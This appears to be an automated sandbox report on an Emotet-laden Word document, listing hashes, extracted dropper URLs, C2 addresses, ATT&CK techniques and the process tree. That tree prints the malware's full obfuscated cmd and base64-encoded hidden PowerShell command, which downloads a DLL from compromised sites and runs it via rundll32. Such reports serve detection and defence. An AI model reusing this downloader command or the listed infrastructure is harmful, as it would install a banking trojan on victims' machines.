emotet | 616f225c95d629abcbed5b0326f80549cd8519f657ab6086a9fa79f009d02f9a

General

Target

januari-05-041480-2021.doc
Size

170KB
MD5

c9b64586c8b3df4596dd1ef21cd2a436
SHA1

a0c4ee3f775fd7120cc67f185f5776db5e1826fe
SHA256

616f225c95d629abcbed5b0326f80549cd8519f657ab6086a9fa79f009d02f9a
SHA512

ad4cf4be919fdd07b13330bde557b76bf82b002a8e0bb66eb574c99acfe588057f4be05347655007eedf7ccc9a0779742cd1188de3c798564389a1acbc74e4f8

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://fathekarim.com/images/jiC/

exe.dropper

https://trumpcommunity.com/usa-no-uykjh/wcS/

exe.dropper

https://comunicacaovertical.com.br/agencia/D0sJl/

exe.dropper

http://datawyse.net/5VGI0/

exe.dropper

http://transfersuvan.com/wp-admin/1114R/

exe.dropper

http://upafrique.com/cgi-bin/iFmg/

exe.dropper

https://radioclype.scola.ac-paris.fr/wp-admin/js/widgets/6S/

Extracted

Family

emotet

Botnet

Epoch2

C2

90.160.138.175:80

74.222.117.42:80

157.245.123.197:8080

50.116.111.59:8080

173.249.20.233:443

200.116.145.225:443

142.112.10.95:20

87.106.139.101:8080

173.70.61.180:80

75.177.207.146:80

121.124.124.40:7080

98.109.133.80:80

37.187.72.193:8080

74.40.205.197:443

220.245.198.194:80

197.211.245.21:80

123.176.25.234:80

194.190.67.75:80

78.188.225.105:80

217.20.166.178:7080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 336 4032 cmd.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

24 2028 powershell.exe
31 3176 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3932 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Yhteuystujcuucrs\nheoogvyrwnzxgo.gij rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	336	4032	cmd.exe

flow	pid	process
24	2028	powershell.exe
31	3176	rundll32.exe

pid	process
3932	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Yhteuystujcuucrs\nheoogvyrwnzxgo.gij	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

576 WINWORD.EXE
576 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exerundll32.exe

pid process

2028 powershell.exe
2028 powershell.exe
2028 powershell.exe
3176 rundll32.exe
3176 rundll32.exe
3176 rundll32.exe
3176 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2028 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

576 WINWORD.EXE
576 WINWORD.EXE
576 WINWORD.EXE
576 WINWORD.EXE
576 WINWORD.EXE
576 WINWORD.EXE
576 WINWORD.EXE

pid	process
576	WINWORD.EXE
576	WINWORD.EXE

pid	process
2028	powershell.exe
2028	powershell.exe
2028	powershell.exe
3176	rundll32.exe
3176	rundll32.exe
3176	rundll32.exe
3176	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	2028	powershell.exe

pid	process
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE
576	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 336 wrote to memory of 3560	336	cmd.exe	msg.exe
PID 336 wrote to memory of 3560	336	cmd.exe	msg.exe
PID 336 wrote to memory of 2028	336	cmd.exe	powershell.exe
PID 336 wrote to memory of 2028	336	cmd.exe	powershell.exe
PID 2028 wrote to memory of 768	2028	powershell.exe	rundll32.exe
PID 2028 wrote to memory of 768	2028	powershell.exe	rundll32.exe
PID 768 wrote to memory of 3932	768	rundll32.exe	rundll32.exe
PID 768 wrote to memory of 3932	768	rundll32.exe	rundll32.exe
PID 768 wrote to memory of 3932	768	rundll32.exe	rundll32.exe
PID 3932 wrote to memory of 3176	3932	rundll32.exe	rundll32.exe
PID 3932 wrote to memory of 3176	3932	rundll32.exe	rundll32.exe
PID 3932 wrote to memory of 3176	3932	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\januari-05-041480-2021.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:576

C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQBUAEUAbQAgACAAdgBBAFIAaQBBAGIAbABFADoAQwBnAEkAagBhACAAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAdABFACcALAAnAHMAeQBzACcALAAnAGkATwAuAGQASQByAGUAQwBUAG8AcgBZACcALAAnAG0ALgAnACkAIAApACAAOwAkADcAagBhAEQAPQAgACAAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsANAB9AHsANgB9AHsAMQB9AHsANQB9ACIAIAAtAGYAJwBjACcALAAnAG4AVABNAGEAbgBBAGcAZQAnACwAJwBzAHkAUwBUAEUAJwAsACcATQAuAG4AZQBUAC4AcwBFAFIAdgBJACcALAAnAGUAUABvACcALAAnAFIAJwAsACcASQAnACkAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuACcAKQArACcAdABpACcAKwAoACcAbgB1ACcAKwAnAGUAJwApACkAOwAkAE8AaQB4ADUAdgAzADIAPQAkAEgANwAzAE0AIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEYAMgAyAEkAOwAkAEkANQA5AFcAPQAoACcASgA0ACcAKwAnADkAWgAnACkAOwAgACQAQwBHAEkAagBBADoAOgAiAEMAUgBFAEEAYABUAGUAYABEAGkAUgBlAGAAQwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBTAEkAbgAnACsAJwBTAGgAJwApACsAKAAnAGYAawAnACsAJwB1ADgAdABTACcAKQArACgAJwBJAG4AVwAnACsAJwBuAHcAJwApACsAJwBzAHAAJwArACgAJwB4ADMAUwBJACcAKwAnAG4AJwApACkAIAAtAEMAUgBlAHAAbABBAEMARQAgACgAJwBTAEkAJwArACcAbgAnACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABRADUAXwBaAD0AKAAnAFQAJwArACgAJwAxACcAKwAnADkATQAnACkAKQA7ACAAIAAoAEcAZQB0AC0AdgBBAFIASQBBAGIAbABFACAAKAAnADcASgAnACsAJwBBAGQAJwApACAAIAAtAHYAYQBMAFUARQBvAG4ATAAgACkAOgA6ACIAcwBFAEMAdQByAGAAaQBUAGAAWQBwAGAAUgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVABfADYASAA9ACgAJwBBACcAKwAoACcANwAnACsAJwA0AEoAJwApACkAOwAkAFgAaQBoADgAZABkAHAAIAA9ACAAKAAnAEEAJwArACgAJwAxACcAKwAnAF8ASAAnACkAKQA7ACQAQwA4ADEAVAA9ACgAJwBEACcAKwAoACcAOAA4ACcAKwAnAEMAJwApACkAOwAkAEQAZQA4ADEANgAzAHkAPQAkAEgATwBNAEUAKwAoACgAKAAnAHgAJwArACcAMwAxAFMAaABmAGsAJwApACsAKAAnAHUAOAAnACsAJwB0ACcAKQArACgAJwB4ADMAMQBXACcAKwAnAG4AdwBzACcAKQArACcAcAAnACsAKAAnAHgAMwAnACsAJwB4ADMAJwApACsAJwAxACcAKQAgAC0AYwByAGUAUABMAEEAYwBlACAAKABbAEMASABBAHIAXQAxADIAMAArAFsAQwBIAEEAcgBdADUAMQArAFsAQwBIAEEAcgBdADQAOQApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAFgAaQBoADgAZABkAHAAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABYADcAMwBVAD0AKAAnAEUANQAnACsAJwA3AEsAJwApADsAJABEADkAZABlAHoAXwBkAD0AKAAoACcAXQBhAG4AJwArACcAdwBbADMAJwApACsAKAAnAHMAOgAvAC8AZgAnACsAJwBhACcAKQArACgAJwB0ACcAKwAnAGgAZQBrACcAKQArACgAJwBhACcAKwAnAHIAaQAnACkAKwAoACcAbQAuACcAKwAnAGMAJwArACcAbwBtAC8AaQBtAGEAJwArACcAZwBlACcAKwAnAHMALwBqACcAKQArACcAaQAnACsAJwBDACcAKwAoACcALwAnACsAJwBAAF0AJwApACsAKAAnAGEAbgB3ACcAKwAnAFsAMwBzADoALwAvACcAKwAnAHQAJwApACsAKAAnAHIAdQBtAHAAYwAnACsAJwBvAG0AbQAnACkAKwAoACcAdQAnACsAJwBuAGkAdAB5ACcAKwAnAC4AJwApACsAKAAnAGMAbwBtAC8AdQAnACsAJwBzACcAKQArACcAYQAnACsAJwAtAG4AJwArACgAJwBvAC0AdQB5AGsAJwArACcAagBoAC8AJwArACcAdwBjACcAKQArACcAUwAnACsAJwAvACcAKwAnAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwBzACcAKwAnADoAJwApACsAJwAvACcAKwAoACcALwBjAG8AbQB1AG4AJwArACcAaQAnACsAJwBjAGEAYwAnACkAKwAoACcAYQBvAHYAZQByAHQAJwArACcAaQAnACsAJwBjACcAKQArACgAJwBhAGwAJwArACcALgBjAG8AbQAnACsAJwAuAGIAJwArACcAcgAvAGEAZwBlACcAKwAnAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC8AJwArACcARAAnACsAJwAwAHMASgBsACcAKQArACcALwAnACsAJwBAACcAKwAoACcAXQBhACcAKwAnAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBkAGEAdAAnACkAKwAnAGEAJwArACcAdwAnACsAKAAnAHkAJwArACcAcwAnACsAJwBlAC4AbgBlAHQALwAnACsAJwA1ACcAKQArACcAVgAnACsAKAAnAEcAJwArACcASQAwAC8AQABdAGEAbgB3AFsAMwAnACsAJwA6AC8AJwApACsAKAAnAC8AdAByAGEAJwArACcAbgBzACcAKQArACgAJwBmAGUAJwArACcAcgBzACcAKQArACcAdQAnACsAKAAnAHYAYQAnACsAJwBuAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AJwApACsAJwBhAGQAJwArACcAbQAnACsAKAAnAGkAJwArACcAbgAvADEAMQAnACkAKwAoACcAMQAnACsAJwA0AFIAJwApACsAJwAvAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwAnACsAJwA6ACcAKQArACgAJwAvAC8AdQAnACsAJwBwAGEAZgByAGkAJwArACcAcQB1AGUALgBjACcAKQArACcAbwBtACcAKwAnAC8AYwAnACsAKAAnAGcAaQAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAGkARgBtAGcAJwArACcALwAnACkAKwAnAEAAXQAnACsAJwBhAG4AJwArACcAdwBbACcAKwAnADMAcwAnACsAKAAnADoALwAnACsAJwAvAHIAJwApACsAKAAnAGEAZAAnACsAJwBpAG8AJwApACsAJwBjAGwAJwArACgAJwB5ACcAKwAnAHAAZQAuAHMAJwArACcAYwBvAGwAJwApACsAKAAnAGEALgAnACsAJwBhAGMAJwArACcALQBwAGEAcgBpACcAKwAnAHMAJwApACsAKAAnAC4AZgByAC8AdwBwACcAKwAnAC0AYQBkACcAKQArACcAbQAnACsAJwBpACcAKwAoACcAbgAnACsAJwAvAGoAJwApACsAJwBzACcAKwAnAC8AJwArACgAJwB3AGkAZAAnACsAJwBnAGUAJwApACsAKAAnAHQAJwArACcAcwAvADYAJwArACcAUwAvACcAKQApAC4AIgByAEUAcABMAGAAQQBgAEMAZQAiACgAKAAnAF0AJwArACgAJwBhAG4AdwAnACsAJwBbACcAKQArACcAMwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAbABgAGkAVAAiACgAJABLAF8ANgBIACAAKwAgACQATwBpAHgANQB2ADMAMgAgACsAIAAkAFYAMQA0AEwAKQA7ACQAUAA1ADgASwA9ACgAJwBCACcAKwAoACcAMQBfACcAKwAnAEgAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEYAMgBxADYAeQBvAHoAIABpAG4AIAAkAEQAOQBkAGUAegBfAGQAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAeQBzAHQARQBNAC4AbgBFAHQALgBXAGUAQgBjAGwASQBlAE4AVAApAC4AIgBEAG8AVwBuAGwAYABPAGEAYABkAGAARgBJAEwARQAiACgAJABGADIAcQA2AHkAbwB6ACwAIAAkAEQAZQA4ADEANgAzAHkAKQA7ACQAQwAzADUATwA9ACgAJwBLADQAJwArACcANgBKACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABEAGUAOAAxADYAMwB5ACkALgAiAGwARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA3ADIAOQAzACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEQAZQA4ADEANgAzAHkALAAoACcAQwAnACsAJwBvAG4AJwArACgAJwB0ACcAKwAnAHIAJwArACcAbwBsAF8AUgAnACkAKwAoACcAdQAnACsAJwBuAEQATABMACcAKQApAC4AIgBUAE8AYABzAFQAcgBgAEkAbgBHACIAKAApADsAJABLADcAOQBFAD0AKAAnAEcAOAAnACsAJwAyAEsAJwApADsAYgByAGUAYQBrADsAJABJADMANQBEAD0AKAAoACcAWQAnACsAJwAwADMAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATAA0ADgATAA9ACgAKAAnAE8AXwAnACsAJwA3ACcAKQArACcARQAnACkA
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:3560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQBUAEUAbQAgACAAdgBBAFIAaQBBAGIAbABFADoAQwBnAEkAagBhACAAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAdABFACcALAAnAHMAeQBzACcALAAnAGkATwAuAGQASQByAGUAQwBUAG8AcgBZACcALAAnAG0ALgAnACkAIAApACAAOwAkADcAagBhAEQAPQAgACAAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsANAB9AHsANgB9AHsAMQB9AHsANQB9ACIAIAAtAGYAJwBjACcALAAnAG4AVABNAGEAbgBBAGcAZQAnACwAJwBzAHkAUwBUAEUAJwAsACcATQAuAG4AZQBUAC4AcwBFAFIAdgBJACcALAAnAGUAUABvACcALAAnAFIAJwAsACcASQAnACkAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuACcAKQArACcAdABpACcAKwAoACcAbgB1ACcAKwAnAGUAJwApACkAOwAkAE8AaQB4ADUAdgAzADIAPQAkAEgANwAzAE0AIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEYAMgAyAEkAOwAkAEkANQA5AFcAPQAoACcASgA0ACcAKwAnADkAWgAnACkAOwAgACQAQwBHAEkAagBBADoAOgAiAEMAUgBFAEEAYABUAGUAYABEAGkAUgBlAGAAQwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBTAEkAbgAnACsAJwBTAGgAJwApACsAKAAnAGYAawAnACsAJwB1ADgAdABTACcAKQArACgAJwBJAG4AVwAnACsAJwBuAHcAJwApACsAJwBzAHAAJwArACgAJwB4ADMAUwBJACcAKwAnAG4AJwApACkAIAAtAEMAUgBlAHAAbABBAEMARQAgACgAJwBTAEkAJwArACcAbgAnACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABRADUAXwBaAD0AKAAnAFQAJwArACgAJwAxACcAKwAnADkATQAnACkAKQA7ACAAIAAoAEcAZQB0AC0AdgBBAFIASQBBAGIAbABFACAAKAAnADcASgAnACsAJwBBAGQAJwApACAAIAAtAHYAYQBMAFUARQBvAG4ATAAgACkAOgA6ACIAcwBFAEMAdQByAGAAaQBUAGAAWQBwAGAAUgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVABfADYASAA9ACgAJwBBACcAKwAoACcANwAnACsAJwA0AEoAJwApACkAOwAkAFgAaQBoADgAZABkAHAAIAA9ACAAKAAnAEEAJwArACgAJwAxACcAKwAnAF8ASAAnACkAKQA7ACQAQwA4ADEAVAA9ACgAJwBEACcAKwAoACcAOAA4ACcAKwAnAEMAJwApACkAOwAkAEQAZQA4ADEANgAzAHkAPQAkAEgATwBNAEUAKwAoACgAKAAnAHgAJwArACcAMwAxAFMAaABmAGsAJwApACsAKAAnAHUAOAAnACsAJwB0ACcAKQArACgAJwB4ADMAMQBXACcAKwAnAG4AdwBzACcAKQArACcAcAAnACsAKAAnAHgAMwAnACsAJwB4ADMAJwApACsAJwAxACcAKQAgAC0AYwByAGUAUABMAEEAYwBlACAAKABbAEMASABBAHIAXQAxADIAMAArAFsAQwBIAEEAcgBdADUAMQArAFsAQwBIAEEAcgBdADQAOQApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAFgAaQBoADgAZABkAHAAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABYADcAMwBVAD0AKAAnAEUANQAnACsAJwA3AEsAJwApADsAJABEADkAZABlAHoAXwBkAD0AKAAoACcAXQBhAG4AJwArACcAdwBbADMAJwApACsAKAAnAHMAOgAvAC8AZgAnACsAJwBhACcAKQArACgAJwB0ACcAKwAnAGgAZQBrACcAKQArACgAJwBhACcAKwAnAHIAaQAnACkAKwAoACcAbQAuACcAKwAnAGMAJwArACcAbwBtAC8AaQBtAGEAJwArACcAZwBlACcAKwAnAHMALwBqACcAKQArACcAaQAnACsAJwBDACcAKwAoACcALwAnACsAJwBAAF0AJwApACsAKAAnAGEAbgB3ACcAKwAnAFsAMwBzADoALwAvACcAKwAnAHQAJwApACsAKAAnAHIAdQBtAHAAYwAnACsAJwBvAG0AbQAnACkAKwAoACcAdQAnACsAJwBuAGkAdAB5ACcAKwAnAC4AJwApACsAKAAnAGMAbwBtAC8AdQAnACsAJwBzACcAKQArACcAYQAnACsAJwAtAG4AJwArACgAJwBvAC0AdQB5AGsAJwArACcAagBoAC8AJwArACcAdwBjACcAKQArACcAUwAnACsAJwAvACcAKwAnAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwBzACcAKwAnADoAJwApACsAJwAvACcAKwAoACcALwBjAG8AbQB1AG4AJwArACcAaQAnACsAJwBjAGEAYwAnACkAKwAoACcAYQBvAHYAZQByAHQAJwArACcAaQAnACsAJwBjACcAKQArACgAJwBhAGwAJwArACcALgBjAG8AbQAnACsAJwAuAGIAJwArACcAcgAvAGEAZwBlACcAKwAnAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC8AJwArACcARAAnACsAJwAwAHMASgBsACcAKQArACcALwAnACsAJwBAACcAKwAoACcAXQBhACcAKwAnAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBkAGEAdAAnACkAKwAnAGEAJwArACcAdwAnACsAKAAnAHkAJwArACcAcwAnACsAJwBlAC4AbgBlAHQALwAnACsAJwA1ACcAKQArACcAVgAnACsAKAAnAEcAJwArACcASQAwAC8AQABdAGEAbgB3AFsAMwAnACsAJwA6AC8AJwApACsAKAAnAC8AdAByAGEAJwArACcAbgBzACcAKQArACgAJwBmAGUAJwArACcAcgBzACcAKQArACcAdQAnACsAKAAnAHYAYQAnACsAJwBuAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AJwApACsAJwBhAGQAJwArACcAbQAnACsAKAAnAGkAJwArACcAbgAvADEAMQAnACkAKwAoACcAMQAnACsAJwA0AFIAJwApACsAJwAvAEAAJwArACcAXQBhACcAKwAnAG4AdwAnACsAKAAnAFsAMwAnACsAJwA6ACcAKQArACgAJwAvAC8AdQAnACsAJwBwAGEAZgByAGkAJwArACcAcQB1AGUALgBjACcAKQArACcAbwBtACcAKwAnAC8AYwAnACsAKAAnAGcAaQAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAGkARgBtAGcAJwArACcALwAnACkAKwAnAEAAXQAnACsAJwBhAG4AJwArACcAdwBbACcAKwAnADMAcwAnACsAKAAnADoALwAnACsAJwAvAHIAJwApACsAKAAnAGEAZAAnACsAJwBpAG8AJwApACsAJwBjAGwAJwArACgAJwB5ACcAKwAnAHAAZQAuAHMAJwArACcAYwBvAGwAJwApACsAKAAnAGEALgAnACsAJwBhAGMAJwArACcALQBwAGEAcgBpACcAKwAnAHMAJwApACsAKAAnAC4AZgByAC8AdwBwACcAKwAnAC0AYQBkACcAKQArACcAbQAnACsAJwBpACcAKwAoACcAbgAnACsAJwAvAGoAJwApACsAJwBzACcAKwAnAC8AJwArACgAJwB3AGkAZAAnACsAJwBnAGUAJwApACsAKAAnAHQAJwArACcAcwAvADYAJwArACcAUwAvACcAKQApAC4AIgByAEUAcABMAGAAQQBgAEMAZQAiACgAKAAnAF0AJwArACgAJwBhAG4AdwAnACsAJwBbACcAKQArACcAMwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAbABgAGkAVAAiACgAJABLAF8ANgBIACAAKwAgACQATwBpAHgANQB2ADMAMgAgACsAIAAkAFYAMQA0AEwAKQA7ACQAUAA1ADgASwA9ACgAJwBCACcAKwAoACcAMQBfACcAKwAnAEgAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEYAMgBxADYAeQBvAHoAIABpAG4AIAAkAEQAOQBkAGUAegBfAGQAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAeQBzAHQARQBNAC4AbgBFAHQALgBXAGUAQgBjAGwASQBlAE4AVAApAC4AIgBEAG8AVwBuAGwAYABPAGEAYABkAGAARgBJAEwARQAiACgAJABGADIAcQA2AHkAbwB6ACwAIAAkAEQAZQA4ADEANgAzAHkAKQA7ACQAQwAzADUATwA9ACgAJwBLADQAJwArACcANgBKACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABEAGUAOAAxADYAMwB5ACkALgAiAGwARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA3ADIAOQAzACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEQAZQA4ADEANgAzAHkALAAoACcAQwAnACsAJwBvAG4AJwArACgAJwB0ACcAKwAnAHIAJwArACcAbwBsAF8AUgAnACkAKwAoACcAdQAnACsAJwBuAEQATABMACcAKQApAC4AIgBUAE8AYABzAFQAcgBgAEkAbgBHACIAKAApADsAJABLADcAOQBFAD0AKAAnAEcAOAAnACsAJwAyAEsAJwApADsAYgByAGUAYQBrADsAJABJADMANQBEAD0AKAAoACcAWQAnACsAJwAwADMAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATAA0ADgATAA9ACgAKAAnAE8AXwAnACsAJwA3ACcAKQArACcARQAnACkA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Shfku8t\Wnwspx3\A1_H.dll,Control_RunDLL
3⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Shfku8t\Wnwspx3\A1_H.dll,Control_RunDLL
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3932

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yhteuystujcuucrs\nheoogvyrwnzxgo.gij",Control_RunDLL
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3176

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Shfku8t\Wnwspx3\A1_H.dll
MD5
2a5ba406f6b0b7032a47fc78d9f22ae2

SHA1
8c37c171b0888f6d34c93e376e075ae9ab773e63

SHA256
9bf39e71f01ce5c80e02e38cff83c4b61be0e87b1243da7391327c4375ca71ae

SHA512
b06e733b4a6a2cce9bc6853da75031fadd57ff16515a2ae48cd6736a7a1dde60bd8ef9dc56c5639c4f6da731cacfba028e8a83224292de44693b9b645ba2c534

Download Submit
\Users\Admin\Shfku8t\Wnwspx3\A1_H.dll
MD5
2a5ba406f6b0b7032a47fc78d9f22ae2

SHA1
8c37c171b0888f6d34c93e376e075ae9ab773e63

SHA256
9bf39e71f01ce5c80e02e38cff83c4b61be0e87b1243da7391327c4375ca71ae

SHA512
b06e733b4a6a2cce9bc6853da75031fadd57ff16515a2ae48cd6736a7a1dde60bd8ef9dc56c5639c4f6da731cacfba028e8a83224292de44693b9b645ba2c534

Download Submit
memory/576-2-0x00007FFE95E00000-0x00007FFE96437000-memory.dmp

Filesize
6.2MB

Download
memory/768-8-0x0000000000000000-mapping.dmp

Download
memory/2028-6-0x000001C76BE80000-0x000001C76BE81000-memory.dmp

Filesize
4KB

Download
memory/2028-7-0x000001C76C160000-0x000001C76C161000-memory.dmp

Filesize
4KB

Download
memory/2028-5-0x00007FFE8F2D0000-0x00007FFE8FCBC000-memory.dmp

Filesize
9.9MB

Download
memory/2028-4-0x0000000000000000-mapping.dmp

Download
memory/3176-13-0x0000000000000000-mapping.dmp

Download
memory/3176-14-0x0000000000420000-0x0000000000440000-memory.dmp

Filesize
128KB

Download
memory/3560-3-0x0000000000000000-mapping.dmp

Download
memory/3932-10-0x0000000000000000-mapping.dmp

Download
memory/3932-12-0x0000000000B30000-0x0000000000B50000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads